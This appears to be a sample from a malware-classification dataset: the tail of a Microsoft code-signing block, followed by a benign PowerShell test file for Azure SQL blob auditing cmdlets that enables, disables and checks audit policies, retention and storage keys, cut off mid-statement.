8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo0MDFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAhGNHD/a7Q0bQ # LWVG9JuGxgLRXseggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJ0ggwIhgPMjAyNDEwMjgwOTA0MDhaGA8yMDI0 # MTAyOTA5MDQwOFowdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6snSCAIBADAKAgEA # AgIIsAIB/zAHAgEAAgISxjAKAgUA6ssjiAIBADA2BgorBgEEAYRZCgQCMSgwJjAM # BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB # CwUAA4IBAQAzScy1wBbpcAxuJLYnsTb2C1R/1ZXPRTrV+7w4izx+oXOHAUu9aHGG # 0qSOBjk7VgyCvjFMirT11HILBBTHTiJcA1z5b5OIdys0RWWcnLCQGSKItm8KNNpe # E+oE9viQRHMLsU/3b8huzWEHTDeOOyc8wNVIJCcPXDGQg42Yf1qMqoPpqyCmMTSj # n3XQ0nllmNeGCeUkdIsNTpwD4mbbVXPVq+KbVt/jatJZw3YrTnjzg1j5AdrolA/a # N3CjM0gf25XwDETanz7KLbHkfz5gxAN8qJTYbSOoyGTYr8cl5Rqrrp+0jwplK+S9 # FVUpwZNtKUwYSNiOSsA9S5bfDmOgcd8kMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAH+0KjCezQhCwEAAQAAAf4wDQYJYIZI # AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG # 9w0BCQQxIgQgIgUJYRNm34mhYvrlsXsctvRoDCflqTa5pJg3nPMVOPgwgfoGCyqG # SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCARhczd/FPInxjR92m2hPWqc+vGOG1+/I0W # tkCstyh0eTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n # dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y # YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz # AAAB/tCowns0IQsBAAEAAAH+MCIEIBHab5Kt80GYeIFqPjdXAVG0HIgzkQ3JSwH6 # 5KUaSnvoMA0GCSqGSIb3DQEBCwUABIICAFBvssS+MyRBbPqfjaJwDgKdxaqMUoAG # Klt0yOkQQLHdnHjauU3yQRSTJVtNbC51oHdJxhw203LbBrgsR2aDiG/w/TOoQFUt # bmbFbeRNceOXcDhzFBo+5ShKlcydPDBWVXfl1IOz3zMsVCwq4xla5DiyINe5por5 # yQ9Ic3jfXjcczDEXhS/2m0pzctgRLmBcex/Z25K93w0NFp/I1niY6d9k2yijiGD5 # oOXKq8oeLdhJbpJHI+tmv1KSNLH05vF502eZD3/sYE9ROJnlexxVakCko5QHvEO+ # hPodL01vvP6l2FMKvkitJEO1ZUSYrBpF/tFOmLayCAxFj3LlPz57PlW+c7s1wa/A # XYdYDWJdDGTeSxKb8wt+AfKsBxGW+OEbjkNvqVa1QriJ+n2IYpo8++cCjmZgDtAX # NXsM95FU12+nbvyTPqWx7PpmEBrOpH2Jr+26poxNmbOSnoiadrJ6f/0rgVjSFbrP # rSnMDlFiEALSzLzV0MM9WsjnF7f7jdKmFjN1CTMqkU3VbltdzVK+a1EoRq+GZVAg # Xdz5HZyrIWWqK4Yebf0/Lj9msI4+gCxvDyta5kEvuhlsdMXUyK2W/Hs8wbAMPXco # A22NbExnpJnK1BZQCbBf+wi2+g+I23bTg12SZZK/k20xcEo6UAHBjaS0sPTmU2Go # +BYP+oxLCa7h # SIG # End signature block
combined_dataset/train/non-malicious/3676.ps1
3676.ps1
function Test-BlobAuditDatabaseUpdatePolicyWithStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.StorageAccountResourceId $params.storageAccountResourceId Assert-AreEqual $policy.BlobStorageTargetState "Enabled" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDatabaseUpdatePolicyWithSameNameStorageOnDifferentRegion { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.StorageAccountResourceId $params.storageAccountResourceId Assert-AreEqual $policy.BlobStorageTargetState "Enabled" $newResourceGroupName = "test-rg2-for-sql-cmdlets-" + $testSuffix New-AzureRmResourceGroup -Location "West Europe" -ResourceGroupName $newResourceGroupName New-AzureRmStorageAccount -StorageAccountName $params.storageAccount -ResourceGroupName $newResourceGroupName -Location "West Europe" -Type Standard_GRS Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.StorageAccountResourceId $params.storageAccountResourceId Assert-AreEqual $policy.BlobStorageTargetState "Enabled" } finally { Remove-AzureRmResourceGroup -Name $newResourceGroupName -Force Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditServerUpdatePolicyWithStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.StorageAccountResourceId $params.storageAccountResourceId Assert-AreEqual $policy.BlobStorageTargetState "Enabled" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDatabaseUpdatePolicyKeepPreviousStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policyBefore = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policyAfter = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policyBefore.StorageAccountResourceId $policyAfter.StorageAccountResourceId Assert-AreEqual $policyAfter.StorageAccountResourceId $params.storageAccountResourceId } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditServerUpdatePolicyKeepPreviousStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId $policyBefore = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policyAfter = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policyBefore.StorageAccountResourceId $policyAfter.StorageAccountResourceId Assert-AreEqual $policyAfter.StorageAccountResourceId $params.storageAccountResourceId } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDisableDatabaseAudit { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.BlobStorageTargetState "Enabled" Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.BlobStorageTargetState "Disabled" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDisableServerAudit { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId Set-AzSqlServerAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.BlobStorageTargetState "Disabled" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditFailedDatabaseUpdatePolicyWithNoStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Assert-Throws { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverWithoutPolicy -DatabaseName $params.databaseWithoutPolicy } } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditFailedServerUpdatePolicyWithNoStorage { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Assert-Throws { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverWithoutPolicy} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditFailWithBadDatabaseIndentity { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Assert-Throws { Get-AzSqlDatabaseAudit -ResourceGroupName "NONEXISTING-RG" -ServerName $params.serverName -DatabaseName $params.databaseName } Assert-Throws { Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName "NONEXISTING-SERVER"-DatabaseName $params.databaseName } Assert-Throws { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName "NONEXISTING-RG" -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId} Assert-Throws { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName "NONEXISTING-SERVER" -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditFailWithBadServerIndentity { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Assert-Throws { Get-AzSqlServerAudit -ResourceGroupName "NONEXISTING-RG" -ServerName $params.serverName } Assert-Throws { Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName "NONEXISTING-SERVER" } Assert-Throws { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName "NONEXISTING-RG" -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId} Assert-Throws { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName "NONEXISTING-SERVER" -StorageAccountResourceId $params.storageAccountResourceId} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditServerStorageKeyRotation { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Primary" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-True { $policy.StorageKeyType -eq "Primary"} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Secondary" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-True { $policy.StorageKeyType -eq "Secondary"} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Primary" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-True { $policy.StorageKeyType -eq "Primary"} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDatabaseStorageKeyRotation { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Primary" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-True { $policy.StorageKeyType -eq "Primary"} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Secondary" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-True { $policy.StorageKeyType -eq "Secondary"} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Primary" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-True { $policy.StorageKeyType -eq "Primary"} } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditServerRetentionKeepProperties { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -RetentionInDays 10; Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -RetentionInDays 11; $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.RetentionInDays 11 Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId; $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.RetentionInDays 11 } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditDatabaseRetentionKeepProperties { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -RetentionInDays 10; Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -RetentionInDays 11; $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.RetentionInDays 11 Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId; $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.RetentionInDays 11 } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditOnDatabase { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix $dbName = $params.databaseName try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.BlobStorageTargetState "Enabled" Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual $policy.AuditAction.Length 0 Assert-AreEqual $policy.RetentionInDays 8 Assert-True { $policy.StorageKeyType -eq "Primary"} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Secondary" -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 -AuditAction "UPDATE ON database::[$($params.databaseName)] BY [public]" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.BlobStorageTargetState "Enabled" Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual $policy.RetentionInDays 8 Assert-True { $policy.StorageKeyType -eq "Secondary"} Assert-AreEqual $policy.AuditAction.Length 1 Assert-AreEqual $policy.AuditAction "UPDATE ON database::[$($params.databaseName)] BY [public]" Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.BlobStorageTargetState "Disabled" Assert-AreEqual $policy.AuditAction.Length 1 Set-AzSqlDatabaseAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -AuditActionGroup @() -AuditAction "UPDATE ON database::[$($params.databaseName)] BY [public]" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.AuditActionGroup.Length 0 Assert-AreEqual $policy.AuditAction.Length 1 Assert-AreEqual $policy.AuditAction[0] "UPDATE ON database::[$($params.databaseName)] BY [public]" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditOnServer { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.BlobStorageTargetState "Enabled" Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual $policy.RetentionInDays 8 Assert-AreEqual $policy.StorageKeyType "Primary" Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -StorageKeyType "Secondary" -AuditActionGroup "SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP", "FAILED_DATABASE_AUTHENTICATION_GROUP" -RetentionInDays 8 $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.BlobStorageTargetState "Enabled" Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-AreEqual $policy.RetentionInDays 8 Assert-AreEqual $policy.StorageKeyType "Secondary" Set-AzSqlServerAudit -BlobStorageTargetState Disabled -ResourceGroupName $params.rgname -ServerName $params.serverName $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.BlobStorageTargetState "Disabled" } finally { Remove-BlobAuditingTestEnvironment $testSuffix } } function Test-BlobAuditWithAuditActionGroups { $testSuffix = getAssetName Create-BlobAuditingTestEnvironment $testSuffix $params = Get-SqlBlobAuditingTestEnvironmentParameters $testSuffix try { Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.AuditActionGroup.Length 3 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::BATCH_COMPLETED_GROUP)} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "APPLICATION_ROLE_CHANGE_PASSWORD_GROUP","DATABASE_OBJECT_PERMISSION_CHANGE_GROUP" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::APPLICATION_ROLE_CHANGE_PASSWORD_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OBJECT_PERMISSION_CHANGE_GROUP)} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "DATABASE_OPERATION_GROUP","DATABASE_LOGOUT_GROUP" $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OPERATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_LOGOUT_GROUP)} Set-AzSqlDatabaseAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlDatabaseAudit -ResourceGroupName $params.rgname -ServerName $params.serverName -DatabaseName $params.databaseName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_OPERATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::DATABASE_LOGOUT_GROUP)} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.AuditActionGroup.Length 3 Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::SUCCESSFUL_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::FAILED_DATABASE_AUTHENTICATION_GROUP)} Assert-True {$policy.AuditActionGroup.Contains([Microsoft.Azure.Commands.Sql.Auditing.Model.AuditActionGroups]::BATCH_COMPLETED_GROUP)} Set-AzSqlServerAudit -BlobStorageTargetState Enabled -ResourceGroupName $params.rgname -ServerName $params.serverName -StorageAccountResourceId $params.storageAccountResourceId -AuditActionGroup "APPLICATION_ROLE_CHANGE_PASSWORD_GROUP","DATABASE_OBJECT_PERMISSION_CHANGE_GROUP" $policy = Get-AzSqlServerAudit -ResourceGroupName $params.rgname -ServerName $params.serverName Assert-AreEqual $policy.AuditActionGroup.Length 2 Assert-True 